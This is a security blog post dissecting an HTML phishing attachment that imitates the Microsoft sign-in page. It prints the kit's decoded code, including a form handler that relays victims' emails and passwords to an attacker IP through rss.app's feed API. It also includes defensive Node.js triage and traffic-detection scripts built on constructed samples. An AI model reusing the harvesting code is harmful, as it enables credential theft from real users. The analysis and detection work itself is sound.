Kirk ISS Cybersecurity Post

Overview

Earlier this week we uncovered a moderately complex phishing campaign whose email and attachment were both rated non-malicious by VirusTotal and by Microsoft's Automated Investigation and Response (AIR). The email itself was unremarkable (apart from looking exactly like a phishing email and arriving from a suspicious domain); it was the attachment that drew our attention. Malicious attachments are nothing new, but this one carried thousands of lines of CSS and markup copied to reproduce the Outlook web login page, plus a large block of Base64-encoded JavaScript that reproduces the Microsoft sign-in flow.

The result: a convincing lure designed to make the user believe the page they are signing in to is the real one.


Deep Dive

The initial email uses addresses harvested by scraping the target organisation's website. In one case an "info@domain" mailbox was both sender and recipient, which lends the message a degree of legitimacy; in another, the "info@domain" address was the sender and the recipient was a user whose address had also been scraped from the web.


The email stated that the user had received a meeting notification, attached as an HTML document. Once downloaded and opened, the attachment serves two functions:

  1. Render a convincing copy of the Outlook web login page, and
  2. Run embedded Base64-encoded JavaScript that replicates the Microsoft sign-in flow and captures the credentials entered into it.


The attachment goes to great lengths to look authentic: the first several hundred lines are the CSS and animations Microsoft's own login page uses. Once opened, an alert reading "Network Connection Error" appears regardless of actual connectivity; the alert is hard-coded, and the "Retry" button drives everything that follows. What differs between browsers is what happens after the retry, because the script branches on whether the browser is Edge.


To understand the attachment we pulled apart the source and decoded every Base64 component. Here is what happens under the hood when the user clicks the "Retry" button (the kit's own identifiers are kept as found, including its misspelled nextHmtl variable; email and nextHmtl are set elsewhere in the attachment):

function start(){
    // hide the fake "Network Connection Error" panel
    document.getElementById("mArea").style.opacity = 0;
    setTimeout(()=>{
        if(!isEdge() ){
            // every browser except Edge: navigate the tab to the decoded second stage,
            // carrying the victim's address in the fragment so the form can be pre-filled
            var ap = "#params?msofficeoutlook=o365apps/vac3uram5aghboqli9yktoefi2dwjj=&id="+email+"&params=vac3uram5aghboqli9yktoefi2dwjj";
            window.location.href =  toText(Base64.decode(nextHmtl))+ap;
        }
        else{
            // Edge: overwrite the current document with the decoded second stage in place
            document.write((Base64.decode(nextHmtl)));
        }
    },2500);
}


The nextHmtl variable (sic) is where the malicious JavaScript takes effect. It decodes to close to 6,000 lines, of which only the last hundred or so actually capture credentials. The rest pull the appropriate resources from Microsoft's servers so the page looks like a genuine login attempt, pre-populated with the recipient's email address for added "validity".
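As an added example (not code from this post and not the phishing kit's own code), the following Node.js script performs the same peeling statically: it finds long Base64 string constants in an HTML attachment, decodes them, rescans each decoded layer for the behaviours described above (runtime decoding, document.write or location.href sinks, a browser gate, a password field) and lists the hosts it finds for review. The rule names, the sample attachment and the 203.0.113.5 address are constructed for the example; isEdge, toText and Base64.decode in the sample stand in for the kit's helpers, which the page does not show.

```javascript
// Added example: static triage of an HTML attachment that hides its real page
// inside Base64 string constants. Node.js, no dependencies.

// Indicators looked for in every decoded layer (names are ours).
const RULES = [
  { id: "b64-sink",      re: /(?:Base64\.decode|atob)\s*\(/,     why: "decodes an embedded blob at runtime" },
  { id: "doc-write",     re: /document\.write\s*\(/,             why: "rewrites the page in place" },
  { id: "redirect",      re: /(?:window\.)?location\.href\s*=/,  why: "navigates the tab to decoded content" },
  { id: "browser-gate",  re: /isEdge\s*\(|navigator\.userAgent/, why: "branches on browser family" },
  { id: "password-form", re: /type\s*=\s*["']password["']/i,     why: "collects a password" },
  { id: "external-url",  re: /https?:\/\/[^\s"'<>]+/g,            why: "contacts an external host" },
];

// var/let/const NAME = "<long run of Base64 characters>"
const BLOB_RE = /\b(?:var|let|const)\s+(\w+)\s*=\s*["']([A-Za-z0-9+/=]{64,})["']/g;

function findBase64Blobs(text) {
  const blobs = [];
  for (const m of text.matchAll(BLOB_RE)) blobs.push({ name: m[1], b64: m[2] });
  return blobs;
}

// Only recurse into blobs that decode to text; anything else is treated as opaque.
function looksTextual(buf) {
  if (buf.length === 0) return false;
  let printable = 0;
  for (const b of buf) if (b === 9 || b === 10 || b === 13 || (b >= 32 && b < 127)) printable++;
  return printable / buf.length > 0.9;
}

function scan(text) {
  const hits = [];
  for (const r of RULES) {
    if (r.re.global) {
      const urls = [...new Set(text.match(r.re) || [])];
      if (urls.length) hits.push({ id: r.id, detail: urls });
    } else if (r.re.test(text)) {
      hits.push({ id: r.id, detail: r.why });
    }
  }
  return hits;
}

// Decode every Base64 constant and scan the result, recursively, with a depth bound.
function peel(text, name = "<attachment>", depth = 0, maxDepth = 5) {
  const layer = { name, depth, hits: scan(text), children: [] };
  if (depth >= maxDepth) return layer;
  for (const blob of findBase64Blobs(text)) {
    const buf = Buffer.from(blob.b64, "base64");
    if (looksTextual(buf)) layer.children.push(peel(buf.toString("utf8"), blob.name, depth + 1, maxDepth));
  }
  return layer;
}

function triageAttachment(html) {
  const tree = peel(html);
  const ids = new Set(), hosts = new Set();
  let layers = 0;
  (function walk(l) {
    layers++;
    for (const h of l.hits) {
      ids.add(h.id);
      if (h.id === "external-url") for (const u of h.detail) { try { hosts.add(new URL(u).host); } catch (e) {} }
    }
    l.children.forEach(walk);
  })(tree);
  // A password form reached through a runtime-decoded blob that is then written
  // into the page or navigated to is the shape of this kit. Hosts are for analyst review:
  // the real kit also loads legitimate Microsoft resources.
  const malicious = ids.has("b64-sink") && ids.has("password-form") && (ids.has("doc-write") || ids.has("redirect"));
  return { malicious, indicators: [...ids].sort(), hosts: [...hosts].sort(), layers };
}

// Constructed sample modelled on the structure described above (not the real attachment):
// layer 0 carries the fake error and the Edge gate, the Base64 blob is the login page.
const INNER_PAGE = `<html><body>
<form id="i0281"><input id="firstem" type="email"><input id="secondpw" type="password"></form>
<script>
$("#i0281").submit(function(e){ e.preventDefault();
  var url = "http://203.0.113.5/rss.php?u=" + $("#firstem").val() + "&k=" + $("#secondpw").val();
  $.ajax({ url: "https://rss.app/graphql", method: "post",
           data: JSON.stringify({ operationName: "createFeed", variables: { url: url } }) });
});
</script></body></html>`;

const SAMPLE_ATTACHMENT = `<html><body>
<div id="mArea">Network Connection Error <button onclick="start()">Retry</button></div>
<script>
var email = "victim@example.invalid";
var nextHmtl = "${Buffer.from(INNER_PAGE).toString("base64")}";
function start(){ if(!isEdge()){ window.location.href = toText(Base64.decode(nextHmtl)); }
                  else { document.write(Base64.decode(nextHmtl)); } }
</script></body></html>`;

console.log(JSON.stringify(triageAttachment(SAMPLE_ATTACHMENT), null, 2));
```

Run it with node against any saved .htm attachment by replacing SAMPLE_ATTACHMENT with the file contents; the verdict rule is deliberately conservative (decode sink plus password form plus a sink that renders the decoded content), so a plain HTML invitation with no encoded layers comes back clean.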


Further investigation showed that victims were made to enter their password several times after an "invalid password" prompt. In the code below, any error returned by the exfiltration request resets the form and sends the victim back to the password step, so repeated consistent entries act as a check that the captured credential set is genuine. In addition, the user-supplied credentials are sent to a GetContact account, which may serve as a notification channel for the attacker. In the final step, everything the victim entered is placed in the query string of a URL on an AWS-hosted server and that URL is handed to rss.app as a new RSS feed; rss.app then fetches it, delivering the credentials to the attacker's server while the victim's browser never contacts that server directly. This is indicative of a "sit back and wait" phishing operation.

Here is the code that harvests the victim's input and sends it back to the attacker:


    // submit handler on the cloned Microsoft sign-in form (#i0281)
    $("#i0281").submit(function(e) {
        e.preventDefault();

        $("#idSIButton10").attr("disabled",true);
        //$("input[type='password']").blur();

        // harvest the pre-filled address and the password the victim typed
        var _email = $("#firstem").val();
        var password = $("#secondpw").val();
        // the credentials ride in the query string of a URL on the attacker's AWS host;
        // asking rss.app to create a feed from that URL makes rss.app fetch it, so the
        // victim's browser only ever talks to rss.app
        var data = {"operationName":"createFeed","variables":{"url":"hxxp://34.237.38.125/rss.php?u="+_email+"&k="+password,"simulate":false,"interfaceType":"GENERATOR"},"query":"mutation createFeed($url: String, $simulate: Boolean, $interfaceType: FeedInterfaceType, $isPreview: Boolean, $scrapingRules: ScrapingRulesInput, $requestObject: RequestObjectInput) {\n  createFeed(url: $url, simulate: $simulate, scrapingRules: $scrapingRules, requestObject: $requestObject, isPreview: $isPreview, interfaceType: $interfaceType) {\n    title\n    description\n    feedUrl\n    siteUrl\n    siteName\n    imageUrl\n    generator\n    items {\n      title\n      url\n      description\n      date\n      enclosure {\n        url\n        __typename\n      }\n      __typename\n    }\n    __typename\n  }\n}\n"};
        $.ajax({
            url: 'https://rss.app/graphql',
            dataType: 'json',
            contentType:'application/json',
            data: JSON.stringify(data),
            dataType:'json',
            method: 'post'
        }).done(function(data) {
                if(data.errors){
                    // feed creation failed: reload in Firefox, otherwise reset the form and
                    // send the victim back to the password step (the "invalid password" prompt)
                    if(navigator.userAgent.toLowerCase().indexOf('firefox') > -1){
                        window.location.reload();
                    } else {
                        $("#idSIButton10").attr("disabled",false);
                        //$("input[type='password']").attr("disabled",false);
                        document.getElementById("i0281").reset();
                        $("#idBtn_Back").click();
                        detetch(email);   // sic; not shown in this excerpt
                    }

                } else{
                    // success: bounce the victim to a harmless PDF so the visit looks benign
                    window.location.href = "https://www.britishcouncil.org/sites/default/files/languages-for-the-future-report.pdf";
                }
        }).fail((data)=>{
            window.location.reload();
        });
    });
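As an added example on the detection side (again not the post's code and not the kit's), the following Node.js script examines captured HTTP requests, such as those recorded when the attachment is detonated in a sandbox or logged by a proxy that keeps POST bodies, and flags the dead-drop pattern shown above: a createFeed call to a feed service whose target URL carries an email address together with another value. It then groups hits per victim, which exposes the re-prompt behaviour as several submissions with more than one distinct secret. The relay host list, the field names and the captured requests are constructed for the example; 203.0.113.5 is a documentation address standing in for the attacker's server.

```javascript
// Added example: spotting credentials relayed through a feed service's
// createFeed API in captured HTTP traffic. Node.js, no dependencies.

const FEED_RELAY_HOSTS = new Set(["rss.app"]);   // third-party services observed as relays (extend as needed)
const EMAIL_RE = /^[^@\s]+@[^@\s]+\.[^@\s]+$/;

// Returns null for anything that is not a createFeed call whose target URL
// carries an email-like value plus a second non-empty value in its query string.
function extractDeadDrop(req) {
  if (req.method !== "POST" || !FEED_RELAY_HOSTS.has(req.host) || req.path !== "/graphql") return null;
  let body;
  try { body = JSON.parse(req.body); } catch (e) { return null; }
  if (body.operationName !== "createFeed" || !body.variables || typeof body.variables.url !== "string") return null;
  let target;
  try { target = new URL(body.variables.url); } catch (e) { return null; }
  let victim = null, secret = null;
  for (const [, value] of target.searchParams) {
    if (!victim && EMAIL_RE.test(value)) victim = value;
    else if (!secret && value.length > 0) secret = value;
  }
  if (!victim || !secret) return null;
  // The callback host is the attacker's server; the relay fetches it on the kit's behalf.
  return { victim, callbackHost: target.host, callbackPath: target.pathname, secret };
}

// Group hits per victim. The kit re-prompts for the password, so one victim usually
// produces several submissions, often with more than one distinct secret.
function summarizeCaptures(requests) {
  const byVictim = new Map();
  for (const req of requests) {
    const hit = extractDeadDrop(req);
    if (!hit) continue;
    let entry = byVictim.get(hit.victim);
    if (!entry) {
      entry = { victim: hit.victim, callbackHosts: new Set(), submissions: 0, secrets: new Set() };
      byVictim.set(hit.victim, entry);
    }
    entry.callbackHosts.add(hit.callbackHost);
    entry.submissions++;
    entry.secrets.add(hit.secret);   // kept in memory only to count distinct values
  }
  // Report without the secrets themselves; the analyst needs the count, not the passwords.
  return [...byVictim.values()].map(e => ({
    victim: e.victim,
    callbackHosts: [...e.callbackHosts].sort(),
    submissions: e.submissions,
    distinctSecrets: e.secrets.size,
    repromptObserved: e.secrets.size > 1,
  }));
}

// Constructed capture (not real traffic). Request bodies mirror the createFeed shape above.
const graphqlBody = (url) =>
  JSON.stringify({ operationName: "createFeed", variables: { url, simulate: false, interfaceType: "GENERATOR" } });

const CAPTURED_REQUESTS = [
  // an ordinary feed creation: no credentials in the target URL, must not be flagged
  { method: "POST", host: "rss.app", path: "/graphql", body: graphqlBody("https://example.org/blog/feed.xml") },
  // first submission
  { method: "POST", host: "rss.app", path: "/graphql",
    body: graphqlBody("http://203.0.113.5/rss.php?u=victim@example.invalid&k=Winter2023") },
  // second submission after the fake "invalid password" prompt
  { method: "POST", host: "rss.app", path: "/graphql",
    body: graphqlBody("http://203.0.113.5/rss.php?u=victim@example.invalid&k=Winter2023!") },
  // same value re-submitted after a reload
  { method: "POST", host: "rss.app", path: "/graphql",
    body: graphqlBody("http://203.0.113.5/rss.php?u=victim@example.invalid&k=Winter2023!") },
  // the decoy document the victim is sent to on success
  { method: "GET", host: "www.britishcouncil.org",
    path: "/sites/default/files/languages-for-the-future-report.pdf", body: "" },
];

console.log(JSON.stringify(summarizeCaptures(CAPTURED_REQUESTS), null, 2));
```

Because the kit never posts to the attacker's server from the victim's browser, a proxy rule keyed on the AWS address alone sees nothing; the useful signal is a POST to a feed service whose requested feed URL looks like a credential pair. The same grouping gives incident responders the list of users who need a password reset.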


What makes this email unusual is the effort put into emulating Microsoft's own code to produce a near-identical login page. Because the script is embedded and encoded in the attachment, the whole flow runs in the same browser tab and looks as innocuous as possible. It may seem odd that so much effort went into the attachment and so little into the delivery of the email; that imbalance suggests the attachment is a purchased kit being reused across private campaigns.

Attacker Details

Domain: emails[dot]outlook365services[dot]com
Sender IP: 54.240.48.109
Receiving IP: 34.237.38.125